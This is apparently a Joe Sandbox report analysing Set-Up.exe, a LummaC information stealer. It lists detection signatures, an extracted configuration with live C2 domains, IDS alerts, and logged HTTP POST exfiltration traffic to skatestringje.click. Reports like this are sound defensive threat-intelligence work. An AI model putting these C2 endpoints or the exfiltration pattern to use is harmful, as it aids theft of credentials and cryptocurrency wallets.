Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Set-Up.exe

Overview

General Information

Sample name:Set-Up.exe
Analysis ID:1591971
MD5:76f313ad20bd3da35ef5a7460caf4f95
SHA1:49143bd00a24052d706b743fe7b5bc22c20c3316
SHA256:e876204ffcf70dda59de05b571e800f5bdfe096c9fbc3714470366201e8e40d1
Tags:de-pumpedexeuser-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to read the PEB
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Set-Up.exe (PID: 7352 cmdline: "C:\Users\user\Desktop\Set-Up.exe" MD5: 76F313AD20BD3DA35EF5A7460CAF4F95)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["finickypwk.lat", "washyceehsu.lat", "miniatureyu.lat", "shoefeatthe.lat", "kickykiduz.lat", "skatestringje.click", "bloodyswif.lat", "leggelatez.lat", "savorraiykj.lat"], "Build id": "c2CoW0--Ledgerlive"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000000.00000003.1940402195.0000000000ACF000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000002.1984991236.0000000002660000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
        • 0x4dd40:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
        00000000.00000003.1937265688.0000000000AC4000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: Set-Up.exe PID: 7352JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
            Process Memory Space: Set-Up.exe PID: 7352JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 1 entries
              No Sigma rule has matched
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-15T16:00:24.847971+010020283713Unknown Traffic192.168.2.449730104.21.75.15443TCP
              2025-01-15T16:00:25.936479+010020283713Unknown Traffic192.168.2.449731104.21.75.15443TCP
              2025-01-15T16:00:27.348911+010020283713Unknown Traffic192.168.2.449732104.21.75.15443TCP
              2025-01-15T16:00:28.931914+010020283713Unknown Traffic192.168.2.449734104.21.75.15443TCP
              2025-01-15T16:00:30.837224+010020283713Unknown Traffic192.168.2.449739104.21.75.15443TCP
              2025-01-15T16:00:32.588655+010020283713Unknown Traffic192.168.2.449741104.21.75.15443TCP
              2025-01-15T16:00:34.421280+010020283713Unknown Traffic192.168.2.449742104.21.75.15443TCP
              2025-01-15T16:00:36.208851+010020283713Unknown Traffic192.168.2.449743104.21.75.15443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-15T16:00:25.414691+010020546531A Network Trojan was detected192.168.2.449730104.21.75.15443TCP
              2025-01-15T16:00:26.445797+010020546531A Network Trojan was detected192.168.2.449731104.21.75.15443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-15T16:00:25.414691+010020498361A Network Trojan was detected192.168.2.449730104.21.75.15443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-15T16:00:26.445797+010020498121A Network Trojan was detected192.168.2.449731104.21.75.15443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-15T16:00:33.116234+010020480941Malware Command and Control Activity Detected192.168.2.449741104.21.75.15443TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: https://skatestringje.click/Avira URL Cloud: Label: malware
              Source: https://skatestringje.click/api/Avira URL Cloud: Label: malware
              Source: skatestringje.clickAvira URL Cloud: Label: malware
              Source: https://skatestringje.click/apiwAvira URL Cloud: Label: malware
              Source: https://skatestringje.click/buAvira URL Cloud: Label: malware
              Source: https://skatestringje.click/apinAvira URL Cloud: Label: malware
              Source: https://skatestringje.click:443/apiAvira URL Cloud: Label: malware
              Source: https://skatestringje.click/apiAvira URL Cloud: Label: malware
              Source: https://skatestringje.click/uAvira URL Cloud: Label: malware
              Source: https://skatestringje.click/piAvira URL Cloud: Label: malware
              Source: https://skatestringje.click/$Avira URL Cloud: Label: malware
              Source: Set-Up.exe.7352.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["finickypwk.lat", "washyceehsu.lat", "miniatureyu.lat", "shoefeatthe.lat", "kickykiduz.lat", "skatestringje.click", "bloodyswif.lat", "leggelatez.lat", "savorraiykj.lat"], "Build id": "c2CoW0--Ledgerlive"}
              Source: Set-Up.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
              Source: unknownHTTPS traffic detected: 104.21.75.15:443 -> 192.168.2.4:49730 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.75.15:443 -> 192.168.2.4:49731 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.75.15:443 -> 192.168.2.4:49732 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.75.15:443 -> 192.168.2.4:49734 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.75.15:443 -> 192.168.2.4:49739 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.75.15:443 -> 192.168.2.4:49741 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.75.15:443 -> 192.168.2.4:49742 version: TLS 1.2
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h0_2_026A1263
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]0_2_0268D233
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 4x nop then cmp word ptr [esi+edi+02h], 0000h0_2_0268A21C
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 4x nop then movzx edi, byte ptr [eax]0_2_0267A2C3
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 4x nop then mov edx, ecx0_2_026A1343
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 4x nop then mov ecx, eax0_2_0268E06F
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 4x nop then mov ecx, eax0_2_0268E02D
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 4x nop then mov edx, eax0_2_0266E03A
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 4x nop then mov ecx, edx0_2_0268A0FA
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 4x nop then mov ebx, eax0_2_026670F3
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 4x nop then mov ebp, eax0_2_026670F3
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 4x nop then mov ecx, eax0_2_0268E084
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-414A5C19h]0_2_0266C173
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 4x nop then movzx eax, byte ptr [esp+edx+0Ah]0_2_0266C173
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-001080B4h]0_2_0267915A
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+000001A0h]0_2_0266B1C3
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 4x nop then mov byte ptr [ebx], cl0_2_0268D6DF
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 4x nop then mov byte ptr [ecx], al0_2_0268D6DF
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]0_2_0268B723
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 4x nop then movzx eax, byte ptr [eax+edx-18h]0_2_0268E7C1
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 4x nop then mov byte ptr [ebx], al0_2_0268E7C1
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 4x nop then mov byte ptr [eax], bl0_2_0268D7B7
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 4x nop then mov word ptr [eax], cx0_2_0268A781
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 4x nop then movzx ebx, byte ptr [edx]0_2_02698403
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 7E3E42A0h0_2_0269B583
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 4x nop then mov byte ptr [ebx], cl0_2_0268DA0D
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 4x nop then mov byte ptr [ecx], al0_2_0268DA0D
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 4x nop then test esi, esi0_2_0269BA03
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-0A66063Dh]0_2_0269DBC3
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 4x nop then push eax0_2_0266D863
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 4x nop then mov ecx, eax0_2_0267A853
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 4x nop then mov byte ptr [edi], al0_2_0267A853
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 4x nop then mov byte ptr [ebx], al0_2_0268E852
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 4x nop then cmp word ptr [ebx+ecx], 0000h0_2_02682813
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 1ED645B4h0_2_0269A943
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 9B8995CDh0_2_0269A943
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 4x nop then movzx ebx, byte ptr [eax+edx]0_2_0267E9E3
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 4x nop then mov word ptr [eax], cx0_2_02674E33
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 4x nop then mov word ptr [esi], cx0_2_02674E33
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 01FCE602h0_2_0269DEF3
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 4x nop then mov word ptr [eax], cx0_2_0267BEFB
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 4x nop then mov ecx, eax0_2_0268DF6F
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 4x nop then movzx eax, byte ptr [esp+edi-73EA04A1h]0_2_0269DF63
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 4x nop then mov esi, ecx0_2_02676F38
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-651CC318h]0_2_0267AF0D
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]0_2_02668C73
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]0_2_02668C73
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 4x nop then movsx ecx, byte ptr [esi+eax]0_2_0267EC53
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 4x nop then mov ecx, eax0_2_0268AC53
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+20h]0_2_02677C3F
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 4x nop then not eax0_2_02675CBB
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h0_2_0268CD73
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 4x nop then mov edx, ecx0_2_0266AD43
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 4x nop then mov edx, ebx0_2_0267AD5E
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 4x nop then mov byte ptr [edi], al0_2_0268ED3A
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h0_2_02686D03
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 13884179h0_2_0269DD13
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h0_2_02676DDB

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49730 -> 104.21.75.15:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49730 -> 104.21.75.15:443
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49731 -> 104.21.75.15:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 104.21.75.15:443
              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49741 -> 104.21.75.15:443
              Source: Malware configuration extractorURLs: finickypwk.lat
              Source: Malware configuration extractorURLs: washyceehsu.lat
              Source: Malware configuration extractorURLs: miniatureyu.lat
              Source: Malware configuration extractorURLs: shoefeatthe.lat
              Source: Malware configuration extractorURLs: kickykiduz.lat
              Source: Malware configuration extractorURLs: skatestringje.click
              Source: Malware configuration extractorURLs: bloodyswif.lat
              Source: Malware configuration extractorURLs: leggelatez.lat
              Source: Malware configuration extractorURLs: savorraiykj.lat
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 104.21.75.15:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 104.21.75.15:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49741 -> 104.21.75.15:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 104.21.75.15:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 104.21.75.15:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49739 -> 104.21.75.15:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49742 -> 104.21.75.15:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49743 -> 104.21.75.15:443
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: skatestringje.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: skatestringje.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=BWJ8AI49User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18108Host: skatestringje.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=ZSJ78F12SDQSP0HFFD5User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8795Host: skatestringje.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=GEZHOTMV3AP6JSGXBAUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20442Host: skatestringje.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=4L0R90MN06WVK36KKMXUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1422Host: skatestringje.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=XSDE08Y004PL7YFLYFUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 564982Host: skatestringje.click
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficDNS traffic detected: DNS query: skatestringje.click
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: skatestringje.click
              Source: Set-Up.exe, 00000000.00000003.1921133389.0000000003A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: Set-Up.exe, 00000000.00000003.1921133389.0000000003A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: Set-Up.exe, 00000000.00000003.1921133389.0000000003A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: Set-Up.exe, 00000000.00000003.1921133389.0000000003A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: Set-Up.exe, 00000000.00000003.1921133389.0000000003A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: Set-Up.exe, 00000000.00000003.1921133389.0000000003A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: Set-Up.exe, 00000000.00000003.1921133389.0000000003A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: Set-Up.exe, 00000000.00000003.1921133389.0000000003A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: Set-Up.exe, 00000000.00000003.1921133389.0000000003A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: Set-Up.exe, 00000000.00000003.1921133389.0000000003A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: Set-Up.exe, 00000000.00000003.1921133389.0000000003A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: Set-Up.exe, 00000000.00000003.1887236361.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, Set-Up.exe, 00000000.00000003.1887345081.0000000003A5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: Set-Up.exe, 00000000.00000003.1887236361.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, Set-Up.exe, 00000000.00000003.1887345081.0000000003A5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: Set-Up.exe, 00000000.00000003.1887236361.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, Set-Up.exe, 00000000.00000003.1887345081.0000000003A5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: Set-Up.exe, 00000000.00000003.1887236361.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, Set-Up.exe, 00000000.00000003.1887345081.0000000003A5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: Set-Up.exe, 00000000.00000003.1887236361.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, Set-Up.exe, 00000000.00000003.1887345081.0000000003A5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: Set-Up.exe, 00000000.00000003.1887236361.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, Set-Up.exe, 00000000.00000003.1887345081.0000000003A5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: Set-Up.exe, 00000000.00000003.1887236361.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, Set-Up.exe, 00000000.00000003.1887345081.0000000003A5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: Set-Up.exe, 00000000.00000003.1982707055.0000000000AD4000.00000004.00000020.00020000.00000000.sdmp, Set-Up.exe, 00000000.00000003.1885880152.0000000000A90000.00000004.00000020.00020000.00000000.sdmp, Set-Up.exe, 00000000.00000003.1964907434.0000000000AD6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://skatestringje.click/
              Source: Set-Up.exe, 00000000.00000003.1885880152.0000000000A90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://skatestringje.click/$
              Source: Set-Up.exe, 00000000.00000003.1964907434.0000000000ADE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://skatestringje.click/api
              Source: Set-Up.exe, 00000000.00000003.1885880152.0000000000A90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://skatestringje.click/api/
              Source: Set-Up.exe, 00000000.00000003.1937265688.0000000000AFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://skatestringje.click/apin
              Source: Set-Up.exe, 00000000.00000003.1982707055.0000000000B02000.00000004.00000020.00020000.00000000.sdmp, Set-Up.exe, 00000000.00000002.1984463320.0000000000B00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://skatestringje.click/apiw
              Source: Set-Up.exe, 00000000.00000003.1982707055.0000000000AD4000.00000004.00000020.00020000.00000000.sdmp, Set-Up.exe, 00000000.00000003.1964907434.0000000000AD6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://skatestringje.click/bu
              Source: Set-Up.exe, 00000000.00000003.1982707055.0000000000AD4000.00000004.00000020.00020000.00000000.sdmp, Set-Up.exe, 00000000.00000003.1885880152.0000000000A90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://skatestringje.click/pi
              Source: Set-Up.exe, 00000000.00000003.1885880152.0000000000A90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://skatestringje.click/u
              Source: Set-Up.exe, 00000000.00000003.1964907434.0000000000AF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://skatestringje.click:443/api
              Source: Set-Up.exe, 00000000.00000003.1888558150.0000000003A71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
              Source: Set-Up.exe, 00000000.00000003.1922938061.0000000003B3A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: Set-Up.exe, 00000000.00000003.1922938061.0000000003B3A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: Set-Up.exe, 00000000.00000003.1888558150.0000000003A6F000.00000004.00000800.00020000.00000000.sdmp, Set-Up.exe, 00000000.00000003.1903083251.0000000003A68000.00000004.00000800.00020000.00000000.sdmp, Set-Up.exe, 00000000.00000003.1888660135.0000000003A68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
              Source: Set-Up.exe, 00000000.00000003.1888660135.0000000003A43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
              Source: Set-Up.exe, 00000000.00000003.1888558150.0000000003A6F000.00000004.00000800.00020000.00000000.sdmp, Set-Up.exe, 00000000.00000003.1903083251.0000000003A68000.00000004.00000800.00020000.00000000.sdmp, Set-Up.exe, 00000000.00000003.1888660135.0000000003A68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
              Source: Set-Up.exe, 00000000.00000003.1888660135.0000000003A43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
              Source: Set-Up.exe, 00000000.00000003.1887236361.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, Set-Up.exe, 00000000.00000003.1887345081.0000000003A5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: Set-Up.exe, 00000000.00000003.1887236361.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, Set-Up.exe, 00000000.00000003.1887345081.0000000003A5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: Set-Up.exe, 00000000.00000003.1922938061.0000000003B3A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
              Source: Set-Up.exe, 00000000.00000003.1922938061.0000000003B3A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
              Source: Set-Up.exe, 00000000.00000003.1922938061.0000000003B3A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: Set-Up.exe, 00000000.00000003.1922938061.0000000003B3A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
